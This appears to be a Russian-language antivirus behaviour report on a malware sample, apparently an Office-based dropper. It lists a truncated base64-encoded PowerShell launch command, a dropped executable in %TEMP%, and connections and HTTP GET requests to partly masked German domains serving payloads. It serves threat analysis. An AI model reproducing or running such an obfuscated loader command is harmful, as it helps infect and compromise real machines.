Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZADIAaABsAG0AZQBtAD0AKAAnAEkAdwB6AGEAeAAnACsAJwB6ACcAKwAnAGMAJwApADsAJgAoACcAbgBlAHcAJwArACcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBOAHYAOgBUAGUATQBwAFwATwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1508
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\862669.cvr
- %TEMP%\office2019\kst21p7ps.exe
Удаляет следующие файлы
- %TEMP%\office2019\kst21p7ps.exe
Подменяет следующие файлы
- %TEMP%\office2019\kst21p7ps.exe
Сетевая активность
Подключается к
- 'je####reiberg.de':80
- 'da###ickdoof.de':80
- 'be#####er-schweiz.de':80
- 'be#####er-schweiz.de':443
- 'br###ammer.de':80
- 'bs####uservice.de':80
- 'ja##a.de':80
- 'm-###sken.de':80
TCP
Запросы HTTP GET
- http://je####reiberg.de/cgi-bin/F/
- http://da###ickdoof.de/cgi-bin/hts/
- http://be#####er-schweiz.de/assets/1v/
- http://br###ammer.de/cgi-bin/d/
- http://bs####uservice.de/anfrage/FZM/
- http://ja##a.de/cgi-bin/x4/
- http://m-###sken.de/cgi-bin/fgV/
Другие
- 'be#####er-schweiz.de':443
UDP
- DNS ASK je####reiberg.de
- DNS ASK da###ickdoof.de
- DNS ASK be#####er-schweiz.de
- DNS ASK br###ammer.de
- DNS ASK bs####uservice.de
- DNS ASK ja##a.de
- DNS ASK m-###sken.de
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZADIAaABsAG0AZQBtAD0AKAAnAEkAdwB6AGEAeAAnACsAJwB6ACcAKwAnAGMAJwApADsAJgAoACcAbgBlAHcAJwArACcALQBpAHQAJwArACcAZQBtACcAKQAgACQAZQBOAHYAOgBUAGUATQBwAFwATwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG... (со скрытым окном)
